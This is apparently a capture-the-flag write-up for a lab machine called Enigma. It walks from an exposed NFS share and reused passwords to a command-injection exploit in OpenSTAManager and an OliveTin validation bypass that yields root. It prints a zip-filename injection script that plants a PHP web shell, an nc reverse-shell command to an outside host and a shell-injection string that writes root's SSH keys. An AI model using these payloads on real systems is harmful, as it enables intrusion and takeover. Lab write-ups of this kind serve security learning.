---
layout: post
title: Enigma - CTF
date: 2026-06-28
pid: "7012"
category: "CTFs"
difficulty: "EASY"
description: "Chaining NFS credential leaks and password reuse to exploit OpenSTAManager command injection, followed by an OliveTin validation bypass for root access."
tags: [HTB, Linux, NFS, OpenSTAManager, OliveTin]
---
### 1. Overview
This challenge involved enumerating an exposed NFS share to recover internal documents containing initial credentials. These credentials provided access to a Roundcube webmail instance, where a reused password unlocked an inbox containing administrative credentials for an OpenSTAManager portal. Exploiting a command injection vulnerability (CVE-2025-69212) within the OpenSTAManager application allowed for a reverse shell to be established. After extracting and cracking database credentials, SSH access was obtained. Privilege escalation was then achieved by port-forwarding an internal OliveTin service and exploiting an argument validation bypass (CVE-2026-27626) to inject a public SSH key into the root user's authorized keys file.
### 2. Recon
Starting off this machine, I ran the standard Nmap service and port scan:
```
╰─❯ nmap -sCV -p- 10.129.21.191 --min-rate 5000 -oN enigma.htb
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http           nginx 1.24.0 (Ubuntu)
110/tcp   open     pop3           Dovecot pop3d
111/tcp   open     rpcbind        2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35327/tcp   mountd
|   100005  1,2,3      39457/tcp6  mountd
|   100005  1,2,3      48232/udp   mountd
|   100005  1,2,3      50442/udp6  mountd
|   100021  1,3,4      34435/tcp6  nlockmgr
|   100021  1,3,4      34517/tcp   nlockmgr
|   100021  1,3,4      43864/udp   nlockmgr
|_  100021  1,3,4      48492/udp6  nlockmgr
143/tcp   open     imap           Dovecot imapd (Ubuntu)
```

The scan found  5 ports:
- ports listing

Going to the website hosted on port 80 did not provide anything useful, so I started looking elsewhere. After re-reading the nmap output, I noticed an NFS instance open and I started looking there.
### 3. Foothold
First I checked if the target machine had anything I could mount:
```
╰─❯ showmount -e 10.129.21.191
Export list for 10.129.21.191:
/srv/nfs/onboarding *
```

Since there was something I could mount, that's what I did.
```
╰─❯ sudo mount -t nfs 10.129.21.191:/srv/nfs/onboarding /tmp/htb_mount -o nolock
```

This directory had a pdf in it named `New_Employee_Access.pdf`. I copied this file back to main machine and then read it. After reading it, I found 3 important things:
- A new domain: `mail001.enigma.htb`
- A username: `kevin`
- A password: `Enigma2024!`

Using all of this information I logged into the `mail001.enigma.htb` subdomain, which succeeded. This subdomain hosted a `Roundcube Webmail version 1.6.16` instance.

Roundcube Webmail version 1.6.16 is vulnerable to multiple different things such as SQLi, XSS, and Information Disclosure, however, I was not able to get any of them to provide useful information.

Moving on, I knew there were 2 users on this service so far, being `sarah` and `kevin`. I decided to try reusing `kevin's` password for the `sarah` user which worked. 

This allowed me to read sarah's inbox which had an email titled `Re: OpenSTAManager Access Request` containing some more credentials and another subdomain:
```
...[SNIP]...

URL: [http://support_001.enigma.htb](http://support_001.enigma.htb)  
Username: admin  
Password: Ne3s4rtars78s

...[SNIP]...
```

Going to the new subdomain, I found that this was running an instance of `OpenSTAManager`. I found the version of this instance to be 2.9.8 via the information page.

OpenSTAManage version 2.9.8 is vulnerable to multiple things. The exploit that I used was command injection labeled `CVE-2025-69212`.

This vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute commands on the target server.

To exploit this, the first thing I needed to do was create the zip file. I used the following script to do that:
```
import zipfile

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_filename = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
zf.writestr(malicious_filename, b"DUMMY_P7M_CONTENT")
```

Running the script created the `exploit.zip` file that I needed.

To upload the payload, I used the OpenSTAManager WebUI since I was already logged into it. By going to `Sales -> Sales invoices` using the navbar on the left side of the screen, I could use the `Importazione FE` plugin, located on the right side of the screen, to upload the malicious payload.

Once the malicious payload was uploaded, I could use the following curl command to execute commands on the target server:
```
╰─❯ curl http://support_001.enigma.htb/files/SHELL.php?c=cat+/etc/passwd
```

After setting up a netcat listener, I used the newly uploaded webshell to launch a revshell:
```
╰─❯ curl 'http://support_001.enigma.htb/files/SHELL.php?c=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.14.18%209001%20%3E%2Ftmp%2Ff'
```

Now that I had a revshell and access to an actual terminal on the server, I could start looking into the config files and databases.

While looking through the config file for OpenSTAManager, I found some database credentials for the user `brollin`:
```
www-data@enigma:~/html/openstamanager$ cat config.inc.php
$db_host = 'localhost';
$db_username = 'brollin';
$db_password = 'Fri3nds@9099';
$db_name = 'openstamanager';
```

Using these credentials, I was able to extract a password hash for the user `haris` through the `zz_users` table in the `openstamanager` database.
```
mysql> select * from zz_users;
2 | haris    | $2y$10$WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC | haris@enigma.htb |            1 |        5 |       1 | 2026-02-18 20:58:28 | 2026-05-26 11:07:03 | NULL        |          NULL
```

After cracking the has using hashcat, I had the following credentials for the `haris` user.
`haris:bestfriends`

I managed to get ssh access by dropping my public ssh key into `haris's` .ssh folder after creating it.
### 4. Root
Now that I had ssh access as the `haris` user, I could start looking for priv-esc options. Starting with my usual `sudo -l`, that returned a message saying `haris` can not run any commands as sudo. The `/opt` directory had an `OliveTin` directory owned by `root`, so I started looking there.

After finding that folder, I checked the open ports and found one that I thought OliveTin was on:
```
haris@enigma:/opt/OliveTin/OliveTin-linux-amd64$ ss -tulnp
tcp      LISTEN     0          4096               127.0.0.1:1337               0.0.0.0:*
```

Using SSH, I forwarded the port to my local machine:
```
╰─❯ ssh -L 1337:127.0.0.1:1337 -i id_rsa haris@enigma.htb
```

Once I got to the web UI for this OliveTin instance, I found that the version running was 3000.10.0 shown by the footer of the page.

This version of OliveTin is vulnerable to CVE-2026-27626. The vulnerability exists due to an argument validation bypass in the `checkShellArgumentSafety` function that fails to block password type arguments.

The config files inside of `/opt/OliveTin...` didnt really provide any useful information either, however, the config files inside of `/etc/OliveTin` had exactly what I needed.
```
haris@enigma:/etc/OliveTin$ cat config.yaml
  - title: Backup Database
    id: backup_database
    icon: "⛁"
    shell: "mysqldump -u {{ db_user }} -p'{{ db_pass }}' {{ db_name }} > /opt/backups/backup.sql"
    popupOnStart: execution-dialog
    arguments:
      - name: db_user
        type: ascii_identifier
        default: backup_svc
      - name: db_pass
        type: password
      - name: db_name
        type: ascii_identifier
```

This action gave me access to a `password` type argument which would allow me to bypass the validation.

To exploit this priv-esc, my plan was to drop my public SSH key into the the `root` users authorized_keys file. Since, I couldnt get the curl command to work reliably, I used the webui instead.

Using the `Backup Database` action, I could inject the following into the `password` field and then click Start:
```
'; echo '<my-public-ssh-key>' > /root/.ssh/authorized_keys #
```

Once that was done, I was able to log in to SSH as root:
```
╰─❯ ssh -i id_rsa root@enigma.htb
Last login: Sun Jun 28 22:30:06 2026 from 10.10.14.18
root@enigma:~# 
```
### 5. Conclusion
Initial access was gained by mounting an exposed NFS share to retrieve a PDF containing employee credentials. These were used to access a Roundcube webmail portal, and password reuse allowed entry into a second user's account. An email in that inbox leaked administrative credentials for an OpenSTAManager instance. By exploiting a known command injection vulnerability (CVE-2025-69212) in the application's `.p7m` file upload feature, a reverse shell was successfully executed. Extracting and cracking a password hash from the backend database then provided standard user SSH access.

Privilege escalation involved discovering an internally listening OliveTin service and forwarding the port to a local machine. Reviewing the service's configuration files revealed a vulnerable action accepting a password-type argument. Exploiting an argument validation bypass (CVE-2026-27626) allowed arbitrary command execution as root, which was leveraged to write a public SSH key into the root account's authorized keys file, immediately granting full administrative access to the machine.
